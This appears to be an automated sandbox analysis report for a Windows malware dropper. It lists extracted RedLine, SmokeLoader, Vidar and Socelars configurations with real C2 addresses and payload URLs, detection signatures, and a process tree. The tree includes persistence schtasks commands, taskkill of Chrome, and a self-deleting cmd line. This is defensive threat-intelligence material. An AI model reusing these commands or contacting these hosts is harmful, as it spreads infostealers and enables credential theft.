Analysis
max time kernel: 81s
max time network: 151s
platform: windows10_x64
resource: win10-en-20211104
submitted: 22/11/2021, 12:51

Static task: static1
Behavioral task: behavioral1
Sample: d9552a15a61f255df3206b63ee0383be.exe
Resource: win7-en-20211104

General
Target: d9552a15a61f255df3206b63ee0383be.exe
Size: 554KB
MD5: d9552a15a61f255df3206b63ee0383be
SHA1: 7c76e2edcf184b90d40003dac71b08e3a3ed2e8c
SHA256: 0cdd906491990c6ba9c24bdd60172057587859a8e649ba7f4b51fece9a0fdac6
SHA512: 0ce1db824d226df28177b6e5394fa1f8483333583d8332680d4cf0cfc8627a53d69c1c857b319dd200e0f38bf88d445a4289d78472fe3167cc39ae6a85f21599
Malware Config
- Extracted: socelars
  http://www.gianninidesign.com/
- Extracted: redline
  185.92.73.160:46771
- Extracted: redline
  13
  136.144.41.178:9295
- Extracted: redline
  TestBest1
  188.227.87.7:10234
- Extracted: smokeloader
  2020
  http://membro.at/upload/
  http://jeevanpunetha.com/upload/
  http://misipu.cn/upload/
  http://zavodooo.ru/upload/
  http://targiko.ru/upload/
  http://vues3d.com/upload/
- Extracted: metasploit
  windows/single_exec
- Extracted: vidar
  48.6
  937
  https://mastodon.online/@valhalla
  https://koyu.space/@valhalla
  profile_id: 937
- Extracted: redline
  udptest
  193.56.146.64:65441
- Extracted: redline
  Ruzki 3k
  185.244.181.71:2119
- Extracted: redline
  ignation
  37.9.13.169:63912
Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6796 | 5044 | rundll32.exe | 124
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6392 | 5044 | rundll32.exe | 124

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (12 IoCs)
resource | yara_rule
behavioral2/memory/1736-192-0x00000000021E0000-0x000000000220E000-memory.dmp | family_redline
behavioral2/memory/2592-200-0x0000000002220000-0x000000000224D000-memory.dmp | family_redline
behavioral2/memory/1392-221-0x0000000002330000-0x000000000235E000-memory.dmp | family_redline
behavioral2/memory/2324-224-0x0000000002400000-0x000000000242E000-memory.dmp | family_redline
behavioral2/memory/2324-231-0x0000000002430000-0x000000000245C000-memory.dmp | family_redline
behavioral2/memory/1392-229-0x00000000024A0000-0x00000000024CC000-memory.dmp | family_redline
behavioral2/memory/2592-213-0x00000000023D0000-0x00000000023FC000-memory.dmp | family_redline
behavioral2/memory/724-214-0x0000000002490000-0x00000000024BC000-memory.dmp | family_redline
behavioral2/memory/1736-207-0x00000000024D0000-0x00000000024FC000-memory.dmp | family_redline
behavioral2/memory/724-199-0x0000000002220000-0x000000000224E000-memory.dmp | family_redline
behavioral2/memory/3796-311-0x0000000000E80000-0x0000000000E9B000-memory.dmp | family_redline
behavioral2/memory/4180-367-0x0000000000418EFE-mapping.dmp | family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x000400000001abcb-150.dat | family_socelars
behavioral2/files/0x000400000001abcb-149.dat | family_socelars

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

Vidar Stealer (2 IoCs)
resource | yara_rule
behavioral2/memory/2052-300-0x0000000000400000-0x00000000004D8000-memory.dmp | family_vidar
behavioral2/memory/2052-299-0x0000000002170000-0x0000000002245000-memory.dmp | family_vidar

Downloads MZ/PE file

Executes dropped EXE (25 IoCs)
pid | Process
956 | gHpwhoCGxUWsmql8C5nAlwbs.exe
1440 | OGpflBgSHNuzxrPxFfnnscqW.exe
1736 | VH7kbYzRqJXJ_EUcJHqV5bPa.exe
680 | XNZwpkTvIAOD78FTHWKpQF_u.exe
2880 | MA4HOG6zBLtW4CknflfVfoVb.exe
2592 | IIEJIZY_SZgssVHr8AKAwUN9.exe
1320 | Ys9xONIZ2zMkfdltG8YIwyLI.exe
1296 | O6FR10TQUM5bpSSUN_mhgVfA.exe
3764 | NJLZolJE37X_FqtXQ3EqKJkr.exe
724 | _VjiwHbtuy37_JPzF6IcOdvI.exe
3300 | obEL72OIYFiysJSfwnbvSnkT.exe
1280 | WVrSv9ymnNaFCHZ1OhI4PXZh.exe
3704 | kDj8E7Fct6tGctK6mmenGu9x.exe
2340 | mnFuOqYf8WL71_aC7nZIaRZs.exe
2052 | NDd0Pa2E0Rb0cZgDOhr9UELU.exe
1740 | mXxK5JogboFNja5c52jC2vWc.exe
1912 | 6uHEVhTPtit6lTxg8fV0eD2N.exe
2888 | SxsxiDh19G4M6ZMjAAn63qOK.exe
3796 | gVf6IXUmOOirYKM8eOhB0zv0.exe
2324 | 9WIJtxlsgOIp2HQf2t6RZdoY.exe
1392 | YlM8f8ZYF7ZBWfH06sVqXVME.exe
3108 | inst2.exe
3388 | jg1_1faf.exe
3508 | rtst1039.exe
700 | kDj8E7Fct6tGctK6mmenGu9x.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation | d9552a15a61f255df3206b63ee0383be.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource | yara_rule
behavioral2/files/0x000400000001ac15-336.dat | themida
behavioral2/files/0x000400000001ac15-335.dat | themida
behavioral2/files/0x000400000001ac1c-352.dat | themida
behavioral2/files/0x000400000001ac1c-351.dat | themida

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (7 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
110 | ip-api.com
163 | ipinfo.io
328 | ip-api.com
21 | ipinfo.io
22 | ipinfo.io
103 | ipinfo.io
105 | ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 3704 set thread context of 700 | 3704 | kDj8E7Fct6tGctK6mmenGu9x.exe | 95

Drops file in Program Files directory (5 IoCs)
description | ioc | Process
File opened for modification | C:\Program Files (x86)\Company\NewProduct\rtst1039.exe | mnFuOqYf8WL71_aC7nZIaRZs.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | mnFuOqYf8WL71_aC7nZIaRZs.exe
File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | mnFuOqYf8WL71_aC7nZIaRZs.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\inst2.exe | mnFuOqYf8WL71_aC7nZIaRZs.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe | mnFuOqYf8WL71_aC7nZIaRZs.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (12 IoCs)
pid | pid_target | Process | procid_target
708 | 680 | WerFault.exe | 70
656 | 1320 | WerFault.exe | 73
4612 | 1740 | WerFault.exe | 83
4936 | 1740 | WerFault.exe | 83
5100 | 1740 | WerFault.exe | 83
4172 | 1740 | WerFault.exe | 83
3612 | 1740 | WerFault.exe | 83
2772 | 4488 | WerFault.exe | 142
5340 | 4488 | WerFault.exe | 142
2452 | 4488 | WerFault.exe | 142
6124 | 4488 | WerFault.exe | 142
5420 | 4488 | WerFault.exe | 142

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | WVrSv9ymnNaFCHZ1OhI4PXZh.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | WVrSv9ymnNaFCHZ1OhI4PXZh.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | WVrSv9ymnNaFCHZ1OhI4PXZh.exe

Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4024 | schtasks.exe
1728 | schtasks.exe

Delays execution with timeout.exe (1 IoCs)
pid | Process
3064 | timeout.exe

Kills process with taskkill (3 IoCs)
pid | Process
5208 | taskkill.exe
5060 | taskkill.exe
4060 | taskkill.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process | entries
2468 | d9552a15a61f255df3206b63ee0383be.exe | 2
956 | gHpwhoCGxUWsmql8C5nAlwbs.exe | 62

Suspicious use of AdjustPrivilegeToken (44 IoCs, grouped by process)
pid | Process | Token(s)
3764 | NJLZolJE37X_FqtXQ3EqKJkr.exe | SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35
656 | WerFault.exe | SeRestorePrivilege, SeBackupPrivilege, SeDebugPrivilege
3796 | gVf6IXUmOOirYKM8eOhB0zv0.exe | SeDebugPrivilege
708 | WerFault.exe | SeDebugPrivilege
1736 | VH7kbYzRqJXJ_EUcJHqV5bPa.exe | SeDebugPrivilege
2888 | SxsxiDh19G4M6ZMjAAn63qOK.exe | SeDebugPrivilege
724 | _VjiwHbtuy37_JPzF6IcOdvI.exe | SeDebugPrivilege
2592 | IIEJIZY_SZgssVHr8AKAwUN9.exe | SeDebugPrivilege
1392 | YlM8f8ZYF7ZBWfH06sVqXVME.exe | SeDebugPrivilege

Suspicious use of WriteProcessMemory (64 IoCs, grouped by target)
pid | Process | wrote to memory of | procid_target | entries
2468 | d9552a15a61f255df3206b63ee0383be.exe | 956 | 69 | 2
2468 | d9552a15a61f255df3206b63ee0383be.exe | 1440 | 77 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 2880 | 76 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 680 | 70 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 2592 | 74 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 1736 | 75 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 1320 | 73 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 724 | 72 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 1296 | 81 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 3764 | 78 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 3704 | 79 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 3300 | 80 | 2
2468 | d9552a15a61f255df3206b63ee0383be.exe | 1280 | 82 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 2340 | 85 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 2052 | 84 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 1740 | 83 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 1912 | 87 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 2888 | 86 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 3796 | 91 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 2324 | 89 | 3
2468 | d9552a15a61f255df3206b63ee0383be.exe | 1392 | 90 | 3
2340 | mnFuOqYf8WL71_aC7nZIaRZs.exe | 3108 | 103 | 3
Processes
-
C:\Users\Admin\AppData\Local\Temp\d9552a15a61f255df3206b63ee0383be.exe"C:\Users\Admin\AppData\Local\Temp\d9552a15a61f255df3206b63ee0383be.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Users\Admin\Pictures\Adobe Films\gHpwhoCGxUWsmql8C5nAlwbs.exe"C:\Users\Admin\Pictures\Adobe Films\gHpwhoCGxUWsmql8C5nAlwbs.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:956
-
-
C:\Users\Admin\Pictures\Adobe Films\XNZwpkTvIAOD78FTHWKpQF_u.exe"C:\Users\Admin\Pictures\Adobe Films\XNZwpkTvIAOD78FTHWKpQF_u.exe"2⤵
- Executes dropped EXE
PID:680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 4003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:708
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_VjiwHbtuy37_JPzF6IcOdvI.exe"C:\Users\Admin\Pictures\Adobe Films\_VjiwHbtuy37_JPzF6IcOdvI.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:724
-
-
C:\Users\Admin\Pictures\Adobe Films\Ys9xONIZ2zMkfdltG8YIwyLI.exe"C:\Users\Admin\Pictures\Adobe Films\Ys9xONIZ2zMkfdltG8YIwyLI.exe"2⤵
- Executes dropped EXE
PID:1320 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 4003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:656
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IIEJIZY_SZgssVHr8AKAwUN9.exe"C:\Users\Admin\Pictures\Adobe Films\IIEJIZY_SZgssVHr8AKAwUN9.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
C:\Users\Admin\Pictures\Adobe Films\VH7kbYzRqJXJ_EUcJHqV5bPa.exe"C:\Users\Admin\Pictures\Adobe Films\VH7kbYzRqJXJ_EUcJHqV5bPa.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"2⤵
- Executes dropped EXE
PID:2880 -
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"3⤵PID:1728
-
-
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"3⤵PID:2272
-
-
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"3⤵PID:3444
-
-
C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"3⤵PID:4180
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"2⤵
- Executes dropped EXE
PID:1440 -
C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"3⤵PID:3736
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NJLZolJE37X_FqtXQ3EqKJkr.exe"C:\Users\Admin\Pictures\Adobe Films\NJLZolJE37X_FqtXQ3EqKJkr.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3764 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:4488
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5060
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3704 -
C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"3⤵
- Executes dropped EXE
PID:700
-
-
-
C:\Users\Admin\Pictures\Adobe Films\obEL72OIYFiysJSfwnbvSnkT.exe"C:\Users\Admin\Pictures\Adobe Films\obEL72OIYFiysJSfwnbvSnkT.exe"2⤵
- Executes dropped EXE
PID:3300
-
-
C:\Users\Admin\Pictures\Adobe Films\O6FR10TQUM5bpSSUN_mhgVfA.exe"C:\Users\Admin\Pictures\Adobe Films\O6FR10TQUM5bpSSUN_mhgVfA.exe"2⤵
- Executes dropped EXE
PID:1296 -
C:\Users\Admin\Documents\4RQU_GVOsbXT3T7wBls4cB0K.exe"C:\Users\Admin\Documents\4RQU_GVOsbXT3T7wBls4cB0K.exe"3⤵PID:1080
-
C:\Users\Admin\Pictures\Adobe Films\V3GCH1dCM4JtyOdD1UWZ2_tC.exe"C:\Users\Admin\Pictures\Adobe Films\V3GCH1dCM4JtyOdD1UWZ2_tC.exe"4⤵PID:4896
-
-
C:\Users\Admin\Pictures\Adobe Films\8tmxLhzOeaMFxSozv75GAV3L.exe"C:\Users\Admin\Pictures\Adobe Films\8tmxLhzOeaMFxSozv75GAV3L.exe"4⤵PID:4488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 6525⤵
- Program crash
PID:2772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 6645⤵
- Program crash
PID:5340
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 7685⤵
- Program crash
PID:2452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 8045⤵
- Program crash
PID:6124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 8005⤵
- Program crash
PID:5420
-
-
-
C:\Users\Admin\Pictures\Adobe Films\a5NwEe3wwV5amklomjrghoSt.exe"C:\Users\Admin\Pictures\Adobe Films\a5NwEe3wwV5amklomjrghoSt.exe"4⤵PID:3600
-
-
C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe"C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe"4⤵PID:3164
-
C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe"C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe" -u5⤵PID:5520
-
-
-
C:\Users\Admin\Pictures\Adobe Films\VfAVvtPyxS7Gw3Zz73JPqETV.exe"C:\Users\Admin\Pictures\Adobe Films\VfAVvtPyxS7Gw3Zz73JPqETV.exe"4⤵PID:5296
-
-
C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"4⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\is-NCSP8.tmp\x1zrysQfONa2jaIoWwX6oB6d.tmp"C:\Users\Admin\AppData\Local\Temp\is-NCSP8.tmp\x1zrysQfONa2jaIoWwX6oB6d.tmp" /SL5="$3030E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"5⤵PID:5620
-
C:\Users\Admin\AppData\Local\Temp\is-VBKB9.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-VBKB9.tmp\lakazet.exe" /S /UID=27096⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\59-5b5fe-bb3-a5b88-7716379af7b28\Nogaguhyka.exe"C:\Users\Admin\AppData\Local\Temp\59-5b5fe-bb3-a5b88-7716379af7b28\Nogaguhyka.exe"7⤵PID:4884
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive & exit8⤵PID:7244
-
C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive9⤵PID:7384
-
C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive10⤵PID:7436
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe /silent /subid=798 & exit8⤵PID:6064
-
C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exeC:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe /silent /subid=7989⤵PID:3816
-
C:\Users\Admin\AppData\Local\Temp\is-8GNNV.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-8GNNV.tmp\vpn.tmp" /SL5="$10398,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe" /silent /subid=79810⤵PID:6168
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵PID:3684
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵PID:6252
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:2196
-
C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exeC:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe /qn CAMPAIGN="654"9⤵PID:6412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe & exit8⤵PID:6324
-
C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exeC:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe9⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe"C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe" -u10⤵PID:8036
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe & exit8⤵PID:7580
-
C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exeC:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe9⤵PID:4784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive & exit8⤵PID:4284
-
C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive9⤵PID:7112
-
C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive10⤵PID:5292
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe /S & exit8⤵PID:6220
-
C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe /S9⤵PID:3328
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9FC3.tmp\tempfile.ps1"10⤵PID:7092
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe /qn CAMPAIGN=654 & exit8⤵PID:7588
-
C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exeC:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe /qn CAMPAIGN=6549⤵PID:7920
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yHUOwrYtcItGUXoLYS8taBHy.exe"C:\Users\Admin\Pictures\Adobe Films\yHUOwrYtcItGUXoLYS8taBHy.exe"4⤵PID:5672
-
C:\Users\Admin\AppData\Roaming\Traffic\setup.exeC:\Users\Admin\AppData\Roaming\Traffic\setup.exe -cid= -sid= -silent=15⤵PID:7460
-
C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe"C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" "--KGyYl1v"6⤵PID:7848
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4024
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WVrSv9ymnNaFCHZ1OhI4PXZh.exe"C:\Users\Admin\Pictures\Adobe Films\WVrSv9ymnNaFCHZ1OhI4PXZh.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1280
-
-
C:\Users\Admin\Pictures\Adobe Films\mXxK5JogboFNja5c52jC2vWc.exe"C:\Users\Admin\Pictures\Adobe Films\mXxK5JogboFNja5c52jC2vWc.exe"2⤵
- Executes dropped EXE
PID:1740 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 6603⤵
- Program crash
PID:4612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 6763⤵
- Program crash
PID:4936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 6803⤵
- Program crash
PID:5100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 6923⤵
- Program crash
PID:4172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 7523⤵
- Program crash
PID:3612
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe"C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe"2⤵
- Executes dropped EXE
PID:2052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im NDd0Pa2E0Rb0cZgDOhr9UELU.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe" & del C:\ProgramData\*.dll & exit3⤵PID:2208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im NDd0Pa2E0Rb0cZgDOhr9UELU.exe /f4⤵
- Kills process with taskkill
PID:4060
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:3064
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mnFuOqYf8WL71_aC7nZIaRZs.exe"C:\Users\Admin\Pictures\Adobe Films\mnFuOqYf8WL71_aC7nZIaRZs.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"3⤵
- Executes dropped EXE
PID:3508
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"3⤵
- Executes dropped EXE
PID:3388
-
-
